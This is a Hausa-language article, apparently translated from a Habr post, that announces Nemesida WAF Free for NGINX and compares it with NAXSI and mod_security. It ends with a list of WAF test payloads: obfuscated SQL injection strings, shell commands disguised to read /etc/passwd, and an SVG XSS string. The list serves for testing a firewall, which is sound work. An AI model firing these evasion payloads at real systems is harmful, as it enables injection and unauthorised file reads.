A bara mun saki Nemesida WAF Free, wani tsari mai ƙarfi don NGINX wanda ke toshe hare-hare akan aikace-aikacen yanar gizo. Ba kamar nau'in kasuwanci ba, wanda ya dogara akan koyan na'ura, sigar kyauta tana nazarin buƙatun ta amfani da hanyar sa hannu kawai.
Siffofin sakin Nemesida WAF 4.0.129
Kafin sakin na yanzu, Nemesida WAF dynamic module yana goyan bayan Nginx Stable 1.12, 1.14 da 1.16 kawai. Sabuwar sakin tana ƙara tallafi ga Nginx Mainline, farawa daga 1.17, da Nginx Plus, farawa daga 1.15.10 (R18).
Me yasa wani WAF?
NAXSI da mod_security tabbas sune mafi kyawun samfuran WAF kyauta, kuma mod_security yana haɓaka ta Nginx, kodayake da farko an yi amfani dashi a cikin Apache2 kawai. Dukansu mafita kyauta ne, buɗe tushen kuma suna da masu amfani da yawa a duniya. Don mod_security, saitin sa hannu na kyauta da kasuwanci ana samun su akan $500 a kowace shekara, don NAXSI akwai sa hannu na kyauta daga cikin akwatin, kuma zaku iya samun ƙarin saitin dokoki, kamar doxsi.
A wannan shekara mun gwada aikin NAXSI da Nemesida WAF Free. A taƙaice game da sakamakon:
- NAXSI baya yin yanke adireshin URL sau biyu a cikin kukis
- NAXSI yana ɗaukar lokaci mai tsawo don daidaitawa - ta tsohuwa, saitunan ƙa'idodin ƙa'idodin za su toshe yawancin buƙatun lokacin aiki tare da aikace-aikacen yanar gizo (izni, gyara bayanin martaba ko abu, shiga cikin safiyo, da sauransu) kuma ya zama dole don ƙirƙirar jerin keɓaɓɓun. , wanda ke yin illa ga tsaro. Nemesida WAF Kyauta tare da saitunan tsoho bai yi tabbataccen ƙarya guda ɗaya ba yayin aiki tare da rukunin yanar gizon.
- adadin hare-haren da aka rasa don NAXSI ya ninka sau da yawa, da dai sauransu.
Duk da gazawar, NAXSI da mod_security suna da aƙalla fa'idodi biyu - buɗe tushen da yawan masu amfani. Muna goyan bayan ra'ayin bayyana lambar tushe, amma ba za mu iya yin haka ba tukuna saboda matsalolin da za a iya samu tare da "fashi da ruwa" na sigar kasuwanci, amma don rama wannan gazawar, muna cikakken bayyana abubuwan da ke cikin sa hannun sa hannu. Muna darajar sirri kuma muna ba da shawarar ku tabbatar da wannan da kanku ta amfani da sabar wakili.
Siffofin Nemesida WAF Kyauta:
- madaidaitan bayanai na sa hannu mai inganci tare da mafi ƙarancin adadin Ƙarya Mai Kyau da Ƙarya mara kyau.
- shigarwa da sabuntawa daga wurin ajiya (yana da sauri da dacewa);
- abubuwa masu sauƙi da fahimta game da abubuwan da suka faru, kuma ba "rikitarwa" kamar NAXSI ba;
- gaba daya kyauta, ba shi da hani kan adadin zirga-zirga, runduna kama-da-wane, da sauransu.
A ƙarshe, zan ba da tambayoyi da yawa don kimanta aikin WAF (an ba da shawarar yin amfani da shi a kowane yanki: URL, ARGS, Headers & Jiki):
')) un","ion se","lect 1,2,3,4,5,6,7,8,9,0,11#"]
')) union/**/select/**/1,/**/2,/**/3,/**/4,/**/5,/**/6,/**/7,/**/8,/**/9,/**/'some_text',/**/11#"]
union(select(1),2,3,4,5,6,7,8,9,0x70656e746573746974,11)#"]
')) union+/*!select*/ (1),(2),(3),(4),(5),(6),(7),(8),(9),(0x70656e746573746974),(11)#"]
')) /*!u%6eion*/ /*!se%6cect*/ (1),(2),(3),(4),(5),(6),(7),(8),(9.),(0x70656e746573746974),(11)#"]
')) %2f**%2funion%2f**%2fselect (1),(2),(3),(4),(5),(6),(7),(8),(9),(0x70656e746573746974),(11)#"]
%5B%221807182982%27%29%29%20uni%22%2C%22on
%20sel%22%2C%22ect%201%2C2%2C3%2C4%2C5%2C6%2C7%2C8%2C9%2C%2some_text%27%2C11%23%22%5D
cat /et?/pa?swd
cat /et'c/pa'ss'wd
cat /et*/pa**wd
e'c'ho 'swd test pentest' |awk '{print "cat /etc/pas"$1}' |bas'h
cat /etc/passwd
cat$u+/etc$u/passwd$u
<svg/onload=alert()//
Idan ba a toshe buƙatun ba, to tabbas WAF za ta rasa ainihin harin. Kafin amfani da misalan, tabbatar cewa WAF ba ta toshe buƙatun halal ba.
source: www.habr.com